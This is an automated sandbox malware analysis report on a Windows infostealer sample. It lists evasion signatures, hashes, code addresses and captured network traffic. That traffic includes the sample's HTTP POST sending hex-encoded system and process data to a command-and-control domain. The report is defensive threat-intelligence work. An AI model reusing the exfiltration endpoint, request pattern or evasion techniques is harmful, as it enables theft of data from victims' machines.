Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HZhObFuFNe.exe

Overview

General Information

Sample name:HZhObFuFNe.exe
renamed because original name is a hash value
Original sample name:2ba7ee5357b8762915d320630e9a59b7.exe
Analysis ID:1578913
MD5:2ba7ee5357b8762915d320630e9a59b7
SHA1:f4995defaafe3b084242e2b9f382c7b379938420
SHA256:9249b72e3a0443ec9df0569d0a3fbe76c52d21c1b5d69f9dfb41d40b819e3181
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • HZhObFuFNe.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\HZhObFuFNe.exe" MD5: 2BA7EE5357B8762915D320630E9A59B7)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: HZhObFuFNe.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: HZhObFuFNe.exeVirustotal: Detection: 63%Perma Link
Source: HZhObFuFNe.exeReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: HZhObFuFNe.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: -----BEGIN PUBLIC KEY-----0_2_00C4DCF0
Source: HZhObFuFNe.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_00C8A5B0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_00C8B560
Source: HZhObFuFNe.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00C2255D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00C229FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444282Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 39 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CEA8C0 recvfrom,0_2_00CEA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444282Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 39 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: HZhObFuFNe.exe, 00000000.00000003.1486137662.0000000001E01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487578348.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1498497294.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487578348.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1498497294.0000000001DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: HZhObFuFNe.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: HZhObFuFNe.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707

System Summary

barindex
PE file contains section with special chars
Source: HZhObFuFNe.exeStatic PE information: section name:
Source: HZhObFuFNe.exeStatic PE information: section name: .idata
Source: HZhObFuFNe.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DDEDD50_3_01DDEDD5
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DE17C10_3_01DE17C1
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DE1ABF0_3_01DE1ABF
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B500_3_01DD5B50
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B500_3_01DD5B50
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B600_3_01DD5B60
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DE1D150_3_01DE1D15
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DE18210_3_01DE1821
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B500_3_01DD5B50
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B500_3_01DD5B50
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C305B00_2_00C305B0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C36FA00_2_00C36FA0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CEB1800_2_00CEB180
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C5F1000_2_00C5F100
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CF00E00_2_00CF00E0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00FAE0300_2_00FAE030
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C862100_2_00C86210
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CEC3200_2_00CEC320
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F744100_2_00F74410
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CF04200_2_00CF0420
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2E6200_2_00C2E620
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C8A7F00_2_00C8A7F0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00FA47800_2_00FA4780
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CEC7700_2_00CEC770
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F867300_2_00F86730
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C349400_2_00C34940
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2A9600_2_00C2A960
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CDC9000_2_00CDC900
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00DF6AC00_2_00DF6AC0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00EDAAC00_2_00EDAAC0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F98BF00_2_00F98BF0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2CBB00_2_00C2CBB0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00DB4B600_2_00DB4B60
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00EDAB2C0_2_00EDAB2C
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00FACC700_2_00FACC70
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F9CD800_2_00F9CD80
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00FA4D400_2_00FA4D40
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F3AE300_2_00F3AE30
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CEEF900_2_00CEEF90
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CE8F900_2_00CE8F90
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F72F900_2_00F72F90
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C44F700_2_00C44F70
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C310E60_2_00C310E6
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C8F10D0_2_00C8F10D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F8D4300_2_00F8D430
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F935B00_2_00F935B0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F756D00_2_00F756D0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00FB17800_2_00FB1780
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00CD98800_2_00CD9880
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F799200_2_00F79920
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00FA3A700_2_00FA3A70
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C61BE00_2_00C61BE0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F91BD00_2_00F91BD0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00F87CC00_2_00F87CC0
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00ED9C800_2_00ED9C80
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00DFCBC0 appears 95 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C2CAA0 appears 64 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C271E0 appears 45 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C3CD40 appears 78 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C650A0 appears 90 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C64FD0 appears 251 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00DD7220 appears 91 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C65340 appears 45 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C64F40 appears 314 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C275A0 appears 633 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C3CCD0 appears 55 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C273F0 appears 106 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00C2C960 appears 32 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: String function: 00D044A0 appears 68 times
Source: HZhObFuFNe.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: HZhObFuFNe.exeStatic PE information: Section: vdxoyfiw ZLIB complexity 0.9943814589799661
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C2255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00C2255D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_2_00C229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00C229FF
Source: C:\Users\user\Desktop\HZhObFuFNe.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\HZhObFuFNe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: HZhObFuFNe.exeVirustotal: Detection: 63%
Source: HZhObFuFNe.exeReversingLabs: Detection: 57%
Source: HZhObFuFNe.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: HZhObFuFNe.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: dhcpcsvc6.dllJump to behavior
